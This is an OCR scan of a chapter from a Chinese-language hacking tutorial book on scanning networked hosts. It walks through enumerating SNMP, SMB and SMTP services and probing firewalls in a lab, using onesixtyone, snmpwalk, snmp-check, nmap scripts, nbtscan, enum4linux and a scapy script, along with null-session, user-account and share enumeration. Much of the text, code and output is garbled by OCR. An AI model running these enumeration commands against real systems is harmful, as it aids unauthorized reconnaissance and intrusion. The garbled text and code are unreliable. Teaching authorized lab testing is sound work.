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step 图 打开 “Windows 组 件 向 导 ” 对 话 框 ， 
双击 “管理 和 监视 工具 ”组 件 ， 如 下 图 
所 示 。 


NT TD 

回回 页 fiR 卓 录 证 书 0.0 mm 

癌 并 管理 joisi 工 及 nm 
口 光 其 地 网 当 广 件 和 打印 服务 um 了 

搓 坟 :从 [ 开 嫩 」 来 音量 和 加 长 表 院 对 Internet Txglorer 的 访问 


a EE 
em 
[Eee 图 打开 “管理 和 监视 工具 ”对 话 框 ， 在 


其 中 选中 管理 和 监视 工具 的 子 组 件 列表 框 
人 如 下 图 所 示 。 


所 各 确 半 空间 
ED 


到 
ee 
管理 和 监视 工具 的 子 组 件 C) 


Lim 习 


到 | 
描述 ， 包 舍 代理 程序 可 以 监视 网络 设备 的 活动 并 且 向 网 络 控制 台 工 作 站 汇报 。 


Cw | 


单 击 “ 确 定 ” 按 钮 ， 会 提示 插入 安装 
二 如 下 图 所 示 。 
划 


取消 


请 格 村 为， Windows WE 55 Service 
-BON 驱动 器 器:) ， 然 
2 襄 旬 本 


es 


step 园 插入 安装 光盘 ， 完 成 组 件 安 装 ， 如 下 
图 所 示 。 


完成 “Windoms 组 件 向 导 ” 


婚 已 友 功 地 元 或 了 iadows 息 件 辣 导 。 


主音 去“ 室 丰 " 训 工 间 此 内 时- 
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[stee 园 安装 完成 后 在 服务 中 会 多 出 两 项 基于 
SNMP 的 服务 ， 如 下 图 所 示 。 


局 5mart Card 


管理 此 计算 


手动 本 地 服务 


已 8 动手 动 
已 和 8 动 手动 


本 地 服务 
本 地 服务 


接收 由 本 地 
启动 你 家庭.… 


[step 图 双击 SNMP Service， 选 择 “ 安 全 ” 
选项 卡 ， 可 以 看 到 默认 配置 是 public 并 且 
接受 来 自任 何 主机 的 SNMP 数 据 包 ， 如 下 图 
所 示 。 


Bh 5NMP Trap Service 
叶 55DP Discovery 5er..， 


下 对 
宁 | 本 好 | 局 复 | 代理 | 隐 半 安全 | 你 地 x 系 | 


Re 


-接受 畴 竺 寿 重 加 一 一 
国体 5 
peblie 了 


EL 多 委 节 ) 圳 除 8] 


按 雪 示 自任 站 主机 的 Sqnr 效 据 所) 
一 接 爱 来 自 这 盐 主 Js 多 [I] 


2. onesixtyone 工 具 


onesixtyone 工 具 是 针对 SNMP 进 行 扫 
描 的 小 工具 ， 使 用 该 工具 可 以 扫描 探测 
SNMP。 具 体操 作 步 又 如 下 : 

使 用 onesixtyone 192.168.1.103 public 
命令 ， 探 测 SNMP， 如 下 图 所 示 。 


FootBRNUIE-W De5IXtyOme T9260, 110 Public 
lscanning 1 hosts, 1 comunities 

192.168.1.183 [public] Hardware: xB6 Fanily 16 Nodel 19 Stepping © AT/AT 
conpATTBLE - software: Windovs 2688 Version 5.1 (Build 2608 Uniprocessor 
Free) 


onesixtyone 工 具 支 持 字典 方式 查 
询 ， 因 此 使 用 dpkg -L onesixtyone 命 令 查 
看 它 是 否 自 带 字典 文件 ， 执 行 效果 如 下 图 
所 示 。 


root@kali:~# dpkg -L onesixtyone 
/. 

/usr 

/usr/bin 

/usr/bin/onesixtyone 

/usr/share 

/usr/share/doc 
/usr/share/doc/onesixtyone 
/usr/share/doc/onesixtyone/README 
/usr/share/doc/onesixtyone/changelog.Debian.amd64.gz 
/usr/share/doc/onesixtyone/changelog.Debian.gz 
/usr/share/doc/onesixtyone/changelog.gz 
/usr/share/doc/onesixtyone/copyright 
/usr/share/doc/onesixtyone/dict.txt 
/usr/share/man 

/usr/share/man/manl 
/usr/share/man/manl/onesixtyone.1.gz 


step 图 如 果 使 用 字典 扫描 ， 可 以 使 用 
onesixtyone -c dirct.txt 192.168.1.103 -o 
my.log -w 100 命 令 ， 其 中 dirct 是 字典 文 


件 ，-o 是 输出 内 容 到 一 个 文件 ，-w 设 置 超时 
时 间 (单位 ms) 。 

移 注 意 : SNMP 是 明文 传输 ， 因 此 可 以 利 
用 抓 包 来 获得 目标 的 community。 


3. snmpwalk 工 具 


snmpwalk 是 一 个 通过 SNMP GETNEXT 
类 型 PDU， 实 现 对 目标 agent 的 某 指定 MIB 
分 支 信息 进行 完整 提取 并 输出 的 工具 。 语 
法 格式 如 下 : 


snmpwalk[ 选 项 ]agent [oid] 


常用 参数 介绍 如 下 : 

® h: 显示 帮助 。 

@ -v1|2c|3: 指定 SNMP 版 本 。 

e -V: 显示 当前 snmpwalk 命 令 行 

版 本 。 

e 了: 指定 重 试 次 数 ， 默 认为 0 次 。 

e -t: 指定 每 次 请 求 的 等 待 超时 时 间 ， 

单位 s， 默 认为 3s。 

e -Cc: 指定 当 在 WALK 时 ， 如 果 发 现 

OID 负 增长 将 是 否 继续 WALK。 

使 用 snmpwalk 工 具 可 以 查看 的 信息 相 
对 比较 多 。 使 用 snmpwalk 192.168.1.103 
-Cc public -v 2c 命 令 ， 由 于 信息 比较 多 ， 这 
里 只 截取 了 其 中 一 部 分 作为 展示 ， 如 下 图 
所 示 。 


nily 16 Model 19 Stepping @ AT/AT| 
1 (Buitd 26060 Uniprocessor Free)" 


.1 1.3.1.1 
ks: (451478) 1:15:14.78 


人 @ 提 示 : ISO 后 面 的 数字 便 是 内 部 库 的 ID 
号 ， 包 括 了 操作 系统 信息 ， 进 程 信息 、 硬 
件 信 息 、MAC 地 址 、IP 地 址 等 。 


snmpwalk 工 具 还 支持 通过 内 部 库 ID 
号 的 形式 查询 ， 使 用 的 命令 为 snmpwalk -c 
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public -v 2c 192.168.1.1.133 < 具体 ID>。 常 
用 的 方法 总 结 如 下 : 

(1) 使 用 snmpwalk -v 2c -c public 192. 
168.1. 103 .1.3.6.1.2.1.25.1 命令 取得 Windows 
端的 系统 进程 用 户 数 等 ， 其 中 -v 指 版 本 ，-c 
指 密 钥 。 

(2) 使 用 snmpwalk -v 2c -c public 192. 
168.1. 103 .1.3.6.1.2.1.25.2.2 命令 取得 系统 
总 内 存 。 

(3) 使 用 snmpwalk -v 2c -c public 192. 
168. 1.103 hrSystemNumUsers 命令 取得 系统 
用 户 数 。 

(4) 使 用 snmpwalk -v 2c -c public 192. 
168.1. 103 .1.3.6.1.2.1.4.20 命令 取得 全 信息 。 

(5) 使 用 snmpwalk -v 2c -c public 192. 
168. 1.103 system 命令 查看 系统 信息 。 

(6) 使 用 snmpwalk -v 2c -c public 192. 
168. 1.103 ifDescr 命令 获取 网 卡 信息 。 

snmpwalk 功 能 还 有 很 多 ， 可 以 获取 
系统 各 种 信息 ， 只 要 更 改 后 面 的 信息 类 型 
即 可 ， 如 果 不 知道 什么 类 型 ， 也 可 以 不 指 
定 ， 如 果 不 指定 将 获取 所 有 信息 。 


4. snmpcheck 工 具 


snmpwalk 显 示 的 信息 非常 多 但 是 不 易 
阅读 ， 而 snmpcheck 会 显示 具体 信息 名 称 
更 方便 使 用 者 阅读 ， 使 用 snmpcheck 要 输入 
snmpcheck 命 令 〈 直 接 输入 snmpcheck 会 出 
现 图 形 化 工具 ) 。 

使 用 snmpcheck 工 具 的 操作 步骤 如 下 : 
[step 图 使 用 snmpcheck -h 命 令 ， 打 开 帮 助 信 
息 ， 可 以 查看 参数 信息 ， 但 可 以 看 到 参数 
并 不 多 ， 如 下 图 所 示 。 


FaaaRaU 9 SPCFECK - 


Usage: snmpcheck [-x] [-nlyl [-h] [-H] [-Y MUN] [-U 【- 行 [l-a] HosTS] 


-h snessage 
a nt 


Don and a 
和 Only check for things 1 can fix 
HOSTS check these hosts for problens. 


x Options 
x forces ascii bs 
start in hidder 


tT at {ineteadyor hd 
(hides 


ty Level of the cenamand 10g (defi 1) 
-LShow the lo 站 
Dene Soar Ch Midd ust brivg ui che dntartaea, 


Ascii Options: 
Don't ever try and re he el tonne 遇 汪 
yAlways fix problem 
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[step 图 使 用 snmp-check 192.168.1.103 命 令 ， 
可 以 查看 主机 的 snmp 信 息 。 下 图 为 查询 出 
来 的 主机 系统 信息 。 


[FJ System informations 


Host IP address 
Hostname : 111111-9B22E9A4 
Description : Hardware: x86 Family 16 
Model 16 Stepping 9 AT/AT COMPATIBLE - Software: Windows 
2666 Version 5.1 (Build 2669 Uniprocessor Free) 


: 192.168.1.163 


Contact : 

Location 1- 

Uptime snmp : 1 day, 05:27:29.84 
Uptime system : 01:55:48.67 

System date : 2918-19-28 13:47:59.3 
Domain : WORKGROUP 


step 了 图 下 图 为 查询 出 来 的 用 户 信息 。 
[FJ User accounES 

Guest 

Administrator 


HelpAssistant 
SUPPORT 388945ag 


[step 加 下 图 为 查询 出 来 的 网 络 信息 。 


FT NEUWOTK INTOrMaTLON: 


IP forwarding enabled : no 
Default TTL : 128 
TCP segments received : 181 
TCP segnents sent £2 
TCP segments retrans :9 

Input datagrams : 6663 
Delivered datagrams : 6661 
Output datagrams : 1118 


[step 园 下 图 为 查询 出 来 的 UDP 端口 开放 
信息 。 


7] Listening UDP portss 
address Local port 
161 
162 
445 
569 
4569 
123 
。 1969 
.103 123 
103 137 
163 138 
~193 19699 


11.2.4 扫描 SMP 协 议 


SMB (Server Message Block) 是 一 个 
协议 名 ， 它 被 用 于 Web 连 接 和 客户 端 与 服务 
器 之 间 的 信息 沟通 ， 其 目的 是 将 DOS 操 作 
系统 中 的 本 地 文件 接口 “中 断 13” 改 造 为 
网 络 文件 系统 。 


1. Nmap 工 具 


使 用 Nmap 工 具 可 以 扫描 SMP 协 议 ， 具 
体操 作 步 又 如 下 : 
step 图 使 用 Nmap -vv -p139.445 192.168.1.1- 
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200 命 令 ， 可 以 扫描 一 个 网 段 中 开放 了 
139、445 端 口 的 机 器 。 扫 描 出 4 台 机 器 ， 其 
中 各 有 两 台 开 启 了 139、445 端 口 ， 如 下 图 
所 示 。 参 数 -vv 是 显示 更 加 详细 的 


Scanning 4 hosts [2 portSs7hosfJ 
Discovered open port 445/tcp on 192.168.1.195 
Discovered open port 445/tcp on 192.168.1.163 
Discovered open port 139/tcp on 192.168.1.165 
192.168.1.193 
kompleted SYN Stealth Scan at 02:51, 1.24s elapsed (8 total ports 


Estee 图 下 图 为 IP 地 址 为 192.168.1.103 的 详细 
信息 


豆 心 o 


Nmap scan report Tor 192.168.1.163 时 | 
Host is up, received arp-response (9.999415 latency) 
Scanned at 2018-10-28 92:57:24 EDT for 23s 


PORT STATE SERVICE REASON 

139/tcp open netbios-ssn syn-ack ttl 128 
445/tcp open microsoft-ds syn-ack ttL 128 
MAC Address: 969:9C:29:A2:4E:697 (VMware) 


[step 图 下 图 为 IP 地 址 为 192.168.1.105 的 详细 
信息 。 
Nmap scan report for 192.168.1.165 


Host is up, received arp-response (9.09938s Latency) 
Scanned at 2618-16-28 92:57:24 EDT for 23s 


PORT STATE SERVICE REASON 

139/tcp open netbios-ssn syn-ack ttL 64 
445/tcp open microsoft-ds syn-ack ttl 64 
MAC Address: 699:6C:29:FA:DD:2A_ (VMware) 


通过 TTL 信 息 可 以 区 分 出 103 是 
Windows 系 统 ，105 是 Linux/Unix 系 统 。 使 用 
Nmap 192.168.1.103 -p139,445 --script=smb- 
os-discovery.nse 命 令 ， 可 以 有 针对 性 地 进行 
扫描 ， 执 行 效果 如 下 图 所 示 。 该 命令 主要 
用 于 确认 开放 了 139、445 端 口 的 设备 是 否 为 
Windows 系 统 ， 可 以 看 到 通过 添加 脚本 ， 再 
进行 扫描 ， 信 息 就 非常 准确 了 。 


Footekali: # nnap 192.168,1.163 -p139,445 --script=smb-03-disCovery.nse 
Starting Mmap 7.76 ( https://nmap.org ) at 2618-19-28 63:25 EDT 

Nnap scan report for 192.168.1.103 

Host 1s up 19.69945s latency!. 


PORT 。 STATE SERVICE 
haeytcp open netbios-ssn 
445/tcp open nicrosoft-ds 
Ac Address: 98:BC:29:A2:4E:97 (VMvare) 


Host script resutts: 
| smb-os-discovery: 
| 05: Windows XP (Windows 2960 LAN Manager) 


| OS CpE: cpe:/o:microsoftiwindows xp::- 
| conputer nane: 111111-9b22e9a4 

| NetBIOS conputer name: 111111-9B22E9A4\x60 
1 

1 


Workgroup: WORKGROUPYxa6 
System time: 2018-19-28T15:25:69+68:60 


[step 图 使 用 相同 的 脚本 对 比 扫 描 Linux 系 
统 ， 同 样 可 以 扫描 出 一 些 信 息 ， 如 下 图 
所 示 。 
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FOTORaUL: /usr /Share/ nnap/ scriptse niap 192.168-1-165 -p139,445 -SCript=sm-05-015Corery. nse 
Starting Nmap 7.79 ( https://nmap.org ) at 2618-19-28 693:37 EDT 

Nnap scan report for 192.168.1.165 

Host is up (9.99647s latency). 


ORT STATE SERVICE 
139/tcp open netbios-ssn 
45/tcp open microsoft-ds 
必 Address: 99:6C:29:FA:DD:2A (VMware) 


ost script results: 

| snb-os-discovery: 

| 0s: Unix (Samba 3.9.29-Debian) 

| NetBIOS computer nane: 

| workgroup: WORKGROUPYXe9 

|_ System tine: 2918-19-28T63:33:28-94:96 


Nmap done: 1 IP address (1 host up) scanned in 6.85 secords 


侈 提 示 : 在 Kali 系 统 中 的 usr/share/Nmap/scripts 目 录 下 存放 了 近 600 个 Nmap 的 脚本 文件 ， 
下 图 所 示 。 针 对 不 同 的 扫描 都 可 以 找到 相应 的 脚本 文件 。 


http-grep.nse nntp-ntlm-info.nse 

http-headers.nse nping-brute.nse 
fp-brute.nse http-huavei-hg5xx-vuln,nse nrpe-enum ,nse 
fp-ls.nse http-icloud-findnyiphone. nse ntp-info.nse 
fp-path-vuln. nse http-icloud-sendrsg.nse ntp-nonlist.nse 
Tp-serverinfo.nse http-1is-short-nane-brute.nse omp2-brute.nse 
fp-shownount. nse http-lis-webdav-vuln.nse omp2-enum- targets.nse 
jp-auth.nse http-internal-ip-disclosure.nse onron-info.nse 
jp-brute.nse http-joonla-brute.nse opentookup-info.nse 
jp-headers.nse http-jsonp -detection.nse openvas-otp-brute.nse 
]p-methods nse http-litespeed-sourcecode-download.nse openwebnet-discovery.nse 
jp-request.nse http-ls.nse oracle-brute.nse 
llseelngeye-info.nse http-najordono2-dir-traversal.nse oracle-brute-stealth.nse 
mdp-info nse LUp-matware-host le oracle-cnun- user sse 
sn-query.nse http-ncnp.nse oracle-sid-brute.nse 
uth-owners.nse http-nethods.nse oracle-tns-version.nse 
urh-spoof .nse http-nethod-tanper.nse ovs-agent-version.nse 
ackorifice-brute.nse http-nobileversion-checker.nse p2p-conficker.nse 
ackorifice-info.nse http-ntln-info.nse path-mty.nse 
acnet -info ,nse http-open-proxy.nse pcanywhere-brute.nse 
anner ,nse http-open- redirect.nse peworx-info.nse 
itcoin-getaddr.nse http-passud.nse pgsql-brute.nse 


这 里 给 出 一 个 通过 脚本 扫描 ， 来 判断 主机 是 否 存在 smb 漏 洞 ， 下 面 是 脚本 当中 给 出 的 
参考 方式 。 另 外 只 作为 测试 使 用 ， 脚 本 扫描 可 能 会 损毁 主机 系统 。 


-- Nmap --script smb-vuln-ms06-025.nse -p445 <host> 
-- Nmap -sU --script smb-vuln-ms06-025.nse -p U:137,T:139 <host> 


上 述 脚 本 中 会 有 使 用 方法 的 详细 描述 ， 除 此 之 外 还 会 给 出 该 脚本 针对 哪些 漏洞 进行 了 
扫描 。 


2. nbtscan 工 具 


使 用 nbtscan 工 具 进 行 扫 描 的 方法 为 : 使 用 nbtscan -r 192.168.1.0/24 命 令 进行 扫描 ， 执 
行 效果 如 下 图 所 示 。 


oo0t@kali: ~# nbtscan -r 192.168.1.6/24 
oing NBT name scan for addresses from 192.168.1.0/24 


P address NetBIOS Name Server User MAC address 
92.168.1.9 Sendto faile' Permission denied 

92.168.1.161 <unknown> <unknown> 

92.168.1.193 111111-9B22E9A4 <server> <unknown> 900:0c:29:a2:4e:0; 
.168.1.195 METASPLOITABLE <server> METASPLOITABLE 99:99:99:99:69:91 


nbtscan 的 优势 在 于 如 果 网 络 防 火 墙 规则 设置 不 严谨 ， 它 可 以 实现 跨 网 段 扫描 ， 例 如 : 
主机 地 址 为 -192.168.1.101， 目 标 主机 地 址 为 -192.168.2.102， 此 时 使 用 nbtsan 可 以 实现 跨 网 
段 扫描 。 
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3. enum4linux 工 具 


使 用 enum4linux 工 具 进行 扫描 的 操作 步骤 如 下 : 
step 图 使 用 enum4linux -a 192.168.1.103 命 令 ， 扫 描 Windows 系 统 ， 执 行 效果 如 下 图 所 示 。 


rootekall: senunalinux -a 132.168.1,103 
lstarting enumatinux ve.8.9 ( http://labs.portcullis.co.uk/application/enunslinux/ ) on Sun Oct 28 04:25:64 2011 


| Targer 1 


ITarget -192.168.1.193 
RID Range 500-559, 1358-1050 
Usernane 


jpassword 
Known Usernam 


administrator，guest，krbtgt，domain admins, root, bin, none 


step 图 在 扫描 结果 中 ， 查 询 基于 SMP 协 议 开 启 了 哪些 服务 ， 如 下 图 所 示 。 


| Nbtstat Information for 192.168.1.163 | 


Looking up status of 192.168.1.163 


111111-9822E69A4 <699> - B <ACTIVE> Workstation Service 
WORKGROUP <69> - <GROUP> B <ACTIVE> Domain/Workgroup Name 
111111-9B22E9A4 <29> - B <ACTIVE> File Server Service 
WORKGROUP <le> - <GROUP> B <ACTIVE> Browser Service Elections 


MAC Address = 60-0C-29-A2-4E-07 
[step 图 使 用 enum4linux 工 具 尝 试 建立 空 连接 ， 执 行 效果 如 下 图 所 示 。 如 果 存 在 空 连接 这 里 


Session Check on 192.168.1.163 | 


+] Server 192.168.1.1903 allows sessions using username '', password ' 


使 用 enum4linux 工 具 扫 描 Linux 系 统 ， 执 行 效果 如 下 图 所 示 。 


oT ENURTUITUX -a 192 168,1 105 ] 
tarting enun4linux ve.8,9 ( http://tabs,portcuttis.co.uk/appLication/enum4tinux/ ) on Sun oct 28 94:34:13 2918 


assword 
nown Usernanes .. administrator, quest, krbtat, donain admins, root, bin, none 


四 查询 扫描 结果 中 ， 基 于 SMP 协 议 开启 了 哪些 服务 ， 如 下 图 所 示 。 


Nbtstat Information for 192.168.1.165 | 


METASPLOITABLE <60> <ACTIVE> Workstation Service 
METASPLOITABLE ”<93> <ACTIVE> ” Messenger Service 
METASPLOITABLE ”<29> <ACTIVE> File Server Service 


._MSBROWSE . <91> - <GROUP> B <ACTIVE> Master Browser 


Looking up status of 192.168.1.165 


WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name 
WORKGROUP <1d> - B <ACTIVE> Master Browser 
WORKGROUP <le> - <GROUP> B <ACTIVE> Browser Service Elections 


-MAC Address = 99-099-99-99-69-69 


Step 图 查询 扫描 结果 中 ， 扫 描 出 来 的 系统 信息 ， 如 下 图 所 示 。 


0S information on 192.168.1.105 | 
se of uninitialized value $os info in concatenation (.) or string at ./enun4linux.pl Line 464 
+] Got 0S info for 192.168.1.195 from snbclient: 
+] Got 05 info for 192.168.1.165 from srvinfo: 

METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.6.29-Debian) 


platforn id : 599 
os version t 4.9 
server type Bx9a63 


[GE 查询 扫描 结果 中 ， 扫 描 出 来 的 用 户 相关 信息 
所 示 。 
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: 9x66669916 Account: 
: 9x66699911 Account: 
69x66669911 Accoun' 
:_6x66669911 Account: 


查询 扫描 结果 中 ， 设 备 开启 的 共享 ， 如 下 图 所 示 。 


user Name: 
www-data Name: 
root 


Step| 


x99666611 Account: games Name: games Desc: (null) 
: : 9x99999911 Account: nobody Name: nobody Desc: (null) 
: 9x4ba acb: 6x69999911 Account: bind Name: (null) Desc: (null) 
: Ox402 acb: Ox00000011 Account: proxy Name: proxy Desc: (null 

: 9x96666611 Account: syslog Name: (null) Desc: (null 


just a user,111,, 


hi 


IIFJ Attempting to Wap shares on 192.168.1-. 
DENIED, Listing: N/A 
OK, Listing: OK 
DENIED, Listing: N/A 
[E] Can't understand response 
NT_STATUS_NETWORK_ACCESS_DENIED listing \* 

DENIED, Listing: N/A 


//192.168.1.195/print$ Mapping: 
//192.168.1.195/tmp Mapping: 
//192.168.1.1905/o0pt Mapping: 
//192.168.1.105/IPC$ 


//192.168.1.105/ADMINS$ Mapping: 


Sharename Type Comment 

prints Disk Printer Drivers 

tmp Disk oh noes! 

opt Disk 

IPpcs$ IPC IPC Service (metasploitable server (Samba 3.0.29-Debian) 

ADMINS IPC IPC Service (metasploitable server (Samba 3.9.29-Debian) 
Reconnecting with SMB1 for workgroup listing. 

Server Comment 

Workgroup Master 

WORKGROUP METASPLOITABLE 


step 图 查询 扫描 结果 中 ， 探 测 出 了 存在 哪些 共享 路 径 ， 哪 些 可 以 访问 ， 如 下 图 所 示 。 
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人 移 注 意 : 在 扫描 结果 中 ， 还 有 一 些 其 他 信息 ， 这 里 不 再 一 一 列 出 。 


11.2.5 扫描 SMTP 


扫描 SMTP 最 主要 的 作用 是 发 现 目标 主机 上 的 邮件 账号 ， 通 过 主动 对 目标 的 SMTP 
(邮件 服务 器 〉 发 动 扫 描 ， 发 现 可 能 存在 的 漏洞 并 收集 邮件 账号 等 信息 。 用 户 可 以 通过 抓 


包 或 者 字典 枚 举 的 方式 发 现 账号 。 


使 用 Nmap 工 具 可 以 进行 SMTP 扫 描 ， 具 体 的 方法 为 : 


使 用 Nmap --script smtp-enum- 


users.nse [--script-args smtp-enum-users.methods=VRFY -p 25,465,587 192.168.1.105 命 令 ， 对 


邮件 服务 器 尝试 用 户 账号 扫描 ， 执 行 效 果 如 下 图 所 示 。 


Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds 
root@kali:-# nmap 
RFY -p 25,465,587 192.168.1.165 

tarting Nmap 7.79 ( https://nmap.org ) at 2918-19-28 94:58 
Failed to resolve "[--script-args". 

Failed to resolve "smtp-enum-users.methods=VRFY". 

map scan report for 192.168.1.195 

ost is up (9.99665s Latency) . 


ORT STATE ”SERVICE 
5/tcp open smtp 
| smtp-enum-users: 
|_ Method RCPT returned a unhandled status code. 
65/tcp closed smtps 
Se7/tep closed submission 

C Address: 66:6C:29:FA:DD:2A (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 6.79 seconds 


--script smtp-enum-users.nse [--script-args smtp-enum-users.methods= 


EDT 


以 上 命令 还 可 以 加 入 一 个 账号 字典 来 进行 扫描 ， 命 令 为 Nmap --script smtp-enum- 
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users.nse [--script-args smtp-enum-users. 
methods=VRFY -u user.txt-p 25,465,587 
192.168.1.105。 其 中 ，-u 参 数 指定 用 户 名 字 
典 文件 。 


11.2.6 ”探测 主机 防火 墙 

通过 对 数据 包 的 发 送 ， 并 检查 返回 
数据 包 ， 可 以 推断 出 哪些 端口 是 被 防火 墙 
过 滤 了 。 这 个 只 能 作为 一 种 推断 结果 ， 会 
存在 一 定 误 差 。 探 测 规则 第 一 次 发 送 SYN 
包 ， 第 二 次 发 送 ACK 包 ， 总 体会 存在 以 下 4 
种 情况 : 

第 1 种 : 发 送 SYN 包 没有 返回 ， 发 送 
ACK 包 回复 RST， 存 在 过 滤 。 

第 2 种 : 发 送 SYN 包 回复 SYN/ACK 或 
者 SYN/RST， 发 送 ACK 包 不 回复 ， 存 在 

第 3 种 : 发 送 SYN 包 回复 SYN/ACK 或 
者 SYN/RST， 发 送 ACK 包 回复 RST， 可 能 
是 开放 状态 ， 不 存在 过 滤 。 

第 4 种 : 发 送 的 数据 包 均 无 回应 ， 端 口 
关闭 状态 。 


1. scapy 工 具 


给 出 一 段 脚本 ， 使 用 该 脚本 推断 端口 
是 否 被 防火 墙 过 滤 。 具 体 代码 如 下 : 


#!/usr/bin/python 
from scapy.all import* 
import logging 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import* 
if lenl(sys.argv) !=3: 
print "Usage /FW_detect.py 
[Target IP] [Target Port]" 
print "Example 
I920168=1.1 B80 
print"Example will perform if filtering 
exists on port 80 of host 192.168.1.1 " 
sys exlit ty) 
ip = sys.argv[1]  # 获 取 IP 地 址 
port = int(sys.argv[2]) # 获 取 端 口 
# 构 建 ACK 数 据 包 
ACK_response = srl(IP(dst=ip)/TCP (dp 
ort=port,flags='A'),timeout=1,verbose=0) 


/EL Oa DY 
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## 构 建 SYN 数 据 包 
SYN_ response= srl(IP(dst=ip)/TCP(dpo 
rt=port,flags='S'),timeout=1,verbose=0) 
# 如 果 ACK、SYN 包 返回 都 是 空 端口 关闭 状态 
if ((ACK response==None)and(SYN 
Tesponse==None) ) : 
print"Port is either unstatefulty 
filtered or host is down" 
# 如 果 ACK 或 者 SYN 两 个 返回 值 有 一 个 为 空 ， 并且 
不 是 两 个 返回 值 不 同时 为 空 
elif ((ACK response==None)or(SYN_ 
response==None)) and not ((ACK_ 
response==None)and (SYN_ response==None)): 
print "stateful filtering in place" 


# 存 在 过 滤 
elt Tmt responselrepl. 
flags)==18: 坦 回复 SYNVRCK 端 口 开 放 


print "Pot is unfiltered and open" 


呈正 二 DnselTePls 
flags) ==20: # 回 复 RST/ACK 端 口 关闭 
print "Port is unfiltered and 
closed" 
else: 
print "Unable to determine if the 


# 其 余 情况 存在 过 滤 


port is filtered" 


2. Nmap 工 具 


使 用 Nmap 工 具 对 防火 墙 进行 扫描 ， 具 
体操 作 步 又 如 下 : 
扫描 80 端 口 ， 使 用 Nmap -sA 192. 
168.1.1 -p 80 命 令 。 执 行 效果 如 下 图 所 示 ， 
可 以 看 到 80 端 口 没有 被 过 滤 。 
brorting Wap 7.78 (https:yjmnap-org ) 828918718-28 06:07 ED 


Nmap scan report for 192.168.1.1 
Host is up (6.98954s latency|. 


PORT ”STATE SERVICE 
Be/tcp unfiltered http 
NAC Address: 1C:FA:68:91:2F:08 (Tp-link Technologies) 


Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds 


[step 图 扫描 其 他 端口 ， 如 果 使 用 Nmap -SA 
192.168.1.1 -p 445 命 令 ， 执 行 效 果 如 下 图 所 
示 ， 可 以 看 到 445 端 口 存在 过 滤 ， 并 给 出 了 
相应 的 提示 信息 。 


Starting Nmap 7.70 ( https://nmap.org ) at 2918-19-28 96:67 ED 
Nmap scan report for 192.168.1.1 
Host is up (98.06032s latency|. 


PORT STATE SERVICE 
445/tcp filtered microsoft-ds 
MAC Address: 1C:FA:68:91:2F:98 (Tp-link Technologies) 


Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds 


11.3 ”实战 演练 


实战 演练 1 一 一 扫描 目标 主机 的 开放 端口 


流光 扫描 器 是 一 款 非 常 出 名 的 中 文 多 
功能 专业 扫描 器 ， 其 功能 强大 、 扫 描 速 度 
快 、 可 靠 性 强 ， 为 广大 黑客 迷 们 所 钟爱 。 
利用 流光 扫描 器 可 以 轻松 探测 目标 主机 的 
开放 端口 。 下 面 将 以 探测 POP3 主 机 的 开放 
端口 为 例 进行 介绍 。 

Bep 国 单 击 桌 面 上 的 流光 扫描 器 程序 图 标 ， 


启动 流光 扫描 器 ， 如 下 图 所 示 。 
SY Bd 0 OR 


员 v 
ES 3 


名 


国人 33 室 1952007 4 在 人 后 所 所 有 
IE 


TE 


[ 周记 ba] 本 

单 击 “ 选 项 ”一 “系统 设置 ” 菜单 
命令 ， 打 开 “ 系 统 设 置 ” 对 话 框 ， 对 优先 
级 、 线 程 数 、 单 词 数 /线程 及 扫描 端口 进行 
设置 ， 如 下 图 所 示 。 


3 


系统 设置 
线程 设置 端口 
pop3: 夯 ” mm， [而 一 


FP: [ar smp: [5 


PROXY [aoa0 sa: [1433 


优先 级 线程 数 ”单词 数 / 线 程 


口 自动 调整 线程 设置 确定 (0) | | 取消 ) | 


第 11 章 ”扫描 无 线 网 络 中 的 主机 = 


EL 


| = 年间 


[Sep 加 打开 “添加 主机 (HTTP) ”对 话 
框 ， 在 该 对 话 框 的 下 拉 列 表 框 中 输入 要 扫 
描 主 机 的 IP 地 址 (这 里 以 192.168.0.105 为 
例 ) ， 如 下 图 所 示 。 


添加 主机 (HTTP) 


192.168.0.109 了 
习 自动 更 新 主机 列表 人) 习 使 用 自动 完成 功能 他 


确定 (0) | 


此 时 ， 在 主 窗口 中 将 显示 出 刚刚 添加 
的 HTTP 主 机 ， 右 击 此 主机 ， 在 弹出 的 快捷 
菜单 中 依次 选择 “探测 ”一 “扫描 主机 端 
口 ” 菜单 命 令 ， 如 下 图 所 示 。 


取消 EC) | 


EL 


[step 图 在 扫描 器 主 窗 口中 选中 “HTTP 主 
机 ” 复 选 框 ， 然 后 右 击 ， 在 弹出 的 快捷 菜 
单 中 选择 “编辑 ”一 “添加 ”选项 ， 如 下 
图 所 示 。 


[se 图 打开 “端口 探测 设置 ”对 话 框 ， 在 该 
对 话 框 中 选中 “ 自 定义 端口 探测 范围 ” 复 
选 框 ， 然 后 在 “范围 ”选项 区 中 设置 要 探 
测 端口 的 范围 ， 如 下 图 所 示 。 
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DRM 重 
因 让 定义 于 口 探 天 区 天 
到 国 
探 邮品 范围 人 [im ”到 [oo 


证 | | RNO | 
step[ 园 设置 完成 后 ， 单 击 “ 确 定 ” 按 钮 ， 开 
始 探 测 目标 主机 的 开放 端口 ， 如 下 图 所 示 。 


rset (50] Buld 3310 OF 


攻 小 站 办 伯 天 志 定 1995 2002 小 作品 后 梭 所 有 
主 吾 主机 


step 回 单 去 桌面 上 的 SmartSniff 程 序 图 标 ， 
打开 SmartSniff 程 序 主 窗口 ， 如 下 图 所 示 。 


枚 smartsniff 一 口 由 
文件 日 ” 往 问 (E) 视 加 (V) 选项 (0) 帮助 (H) 

入 本 | 

3 协议 。 本 地 地 址 远 入 地址 本 地 入 口 。 远程 浇 口 

< > 


单 击 “ 开 始 捕 捉 ” 按 钮 或 按 F5 键 ， 开 
始 捕获 当前 主机 与 网 络 服务 器 之 间 传 输 的 
数据 包 ， 如 下 图 所 示 。 


证 旭 腿 | 

扫描 完毕 后 ， 将 会 自动 弹出 “探测 结 
果 ” 对 话 框 ， 如 果 目 标 主机 存在 开放 端口 ， 
就 会 在 该 对 话 框 中 显示 出 来 ， 如 下 图 所 示 。 


探测 结果 


开放 端口 : 


主机 192.168.0.105 淡 口 0080.… 开 局 (PROXY) 
